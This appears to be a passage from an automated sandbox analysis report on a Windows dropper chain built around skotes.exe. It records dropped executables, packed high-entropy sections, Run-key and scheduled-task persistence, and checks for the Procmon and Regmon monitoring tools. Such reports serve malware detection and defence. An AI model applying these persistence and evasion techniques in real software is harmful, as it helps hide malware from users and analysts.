Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 4.2.skotes.exe.470000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 7.2.skotes.exe.470000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bleglpjp:EW;ozncbdew:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Unpacked PE file: 10.2.1171a5b648.exe.f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;usisoqoi:EW;igxiqctn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;usisoqoi:EW;igxiqctn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Unpacked PE file: 31.2.1171a5b648.exe.f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;usisoqoi:EW;igxiqctn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;usisoqoi:EW;igxiqctn:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: num.exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: real checksum: 0x2b0426 should be: 0x2affbf
Source: random[1].exe.8.dr Static PE information: real checksum: 0x2e22aa should be: 0x2ddb21
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: real checksum: 0x1cae90 should be: 0x1d74b7
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: real checksum: 0x1cae90 should be: 0x1d74b7
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: real checksum: 0x2b0426 should be: 0x2affbf
Source: random[1].exe0.8.dr Static PE information: real checksum: 0x209bb8 should be: 0x20b8de
Source: 6cadd3f0fd.exe.8.dr Static PE information: real checksum: 0x2e22aa should be: 0x2ddb21
Source: file.exe Static PE information: real checksum: 0x2e22aa should be: 0x2ddb21
Source: 1171a5b648.exe.8.dr Static PE information: real checksum: 0x209bb8 should be: 0x20b8de
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1cae90 should be: 0x1d74b7
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: real checksum: 0x2b0426 should be: 0x2affbf
Source: num[1].exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: pfboyhbl
Source: file.exe Static PE information: section name: mirdfaun
Source: file.exe Static PE information: section name: .taggant
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name:
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: .idata
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: ucxgvins
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: nulvttal
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: .taggant
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name:
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: .idata
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name:
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: bleglpjp
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: ozncbdew
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: bleglpjp
Source: skotes.exe.3.dr Static PE information: section name: ozncbdew
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name: pfboyhbl
Source: random[1].exe.8.dr Static PE information: section name: mirdfaun
Source: random[1].exe.8.dr Static PE information: section name: .taggant
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name:
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: .idata
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: pfboyhbl
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: mirdfaun
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: usisoqoi
Source: random[1].exe0.8.dr Static PE information: section name: igxiqctn
Source: random[1].exe0.8.dr Static PE information: section name: .taggant
Source: 1171a5b648.exe.8.dr Static PE information: section name:
Source: 1171a5b648.exe.8.dr Static PE information: section name: .rsrc
Source: 1171a5b648.exe.8.dr Static PE information: section name: .idata
Source: 1171a5b648.exe.8.dr Static PE information: section name:
Source: 1171a5b648.exe.8.dr Static PE information: section name: usisoqoi
Source: 1171a5b648.exe.8.dr Static PE information: section name: igxiqctn
Source: 1171a5b648.exe.8.dr Static PE information: section name: .taggant
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name:
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: .idata
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: ucxgvins
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: nulvttal
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: .taggant
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name:
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: .idata
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: ucxgvins
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: nulvttal
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: .taggant
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name:
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: .idata
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name:
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: bleglpjp
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: ozncbdew
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011C8329 push ebx; ret 0_3_011C8330
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011CCF49 push ebx; ret 0_3_011CCF50
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011C8BB8 push ebp; retf 0_3_011C8BC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011C8BB8 push ebp; retf 0_3_011C8BC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011CD7D8 push ebp; retf 0_3_011CD7E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011CEDFB pushad ; ret 0_3_011CEF11
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011C8BB8 push ebp; retf 0_3_011C8BC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011CD7D8 push ebp; retf 0_3_011CD7E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_011CEDFB pushad ; ret 0_3_011CEF11
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A199D0 push ebp; retf 0_3_05A199D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A199D0 push ebp; retf 0_3_05A199D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A2109B push ebp; ret 0_3_05A210A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A2109B push ebp; ret 0_3_05A210A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A2109B push ebp; ret 0_3_05A210A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1E09D pushad ; ret 0_3_05A1E0A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1E09D pushad ; ret 0_3_05A1E0A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1D028 pushfd ; iretd 0_3_05A1D052
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1D028 pushfd ; iretd 0_3_05A1D052
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1C86F pushad ; retf 0_3_05A1C873
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1C86F pushad ; retf 0_3_05A1C873
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1DC44 push esi; ret 0_3_05A1DC45
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1DC44 push esi; ret 0_3_05A1DC45
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1AFF3 pushad ; ret 0_3_05A1B109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1AFF3 pushad ; ret 0_3_05A1B109
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1C7D7 push ebp; retf 0_3_05A1C7EC
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1C7D7 push ebp; retf 0_3_05A1C7EC
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1CEAD push FFFFFF82h; ret 0_3_05A1CEC7
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A1CEAD push FFFFFF82h; ret 0_3_05A1CEC7
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A21263 push cs; ret 0_3_05A21271
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A21263 push cs; ret 0_3_05A21271
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05A21263 push cs; ret 0_3_05A21271
Source: file.exe Static PE information: section name: entropy: 7.974910173943292
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.0.dr Static PE information: section name: entropy: 7.791645043288012
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: entropy: 7.979529969981847
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: section name: bleglpjp entropy: 7.953143642742956
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.979529969981847
Source: skotes.exe.3.dr Static PE information: section name: bleglpjp entropy: 7.953143642742956
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.974910173943292
Source: 6cadd3f0fd.exe.8.dr Static PE information: section name: entropy: 7.974910173943292
Source: random[1].exe0.8.dr Static PE information: section name: usisoqoi entropy: 7.953872207980885
Source: 1171a5b648.exe.8.dr Static PE information: section name: usisoqoi entropy: 7.953872207980885
Source: 5TAVJ2XDPW30B3ZI4A9E75FX93.exe.9.dr Static PE information: section name: entropy: 7.791645043288012
Source: A5RXP2EPUMEJDLAL7A3JI.exe.13.dr Static PE information: section name: entropy: 7.791645043288012
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: entropy: 7.979529969981847
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: section name: bleglpjp entropy: 7.953143642742956
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File created: C:\Users\user\AppData\Local\Temp\5TAVJ2XDPW30B3ZI4A9E75FX93.exe
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File created: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002779001\num.exe
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File created: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1171a5b648.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 275df0ca27.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6cadd3f0fd.exe
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6cadd3f0fd.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6cadd3f0fd.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1171a5b648.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1171a5b648.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 275df0ca27.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 275df0ca27.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process information set: NOOPENFILEERRORBOX
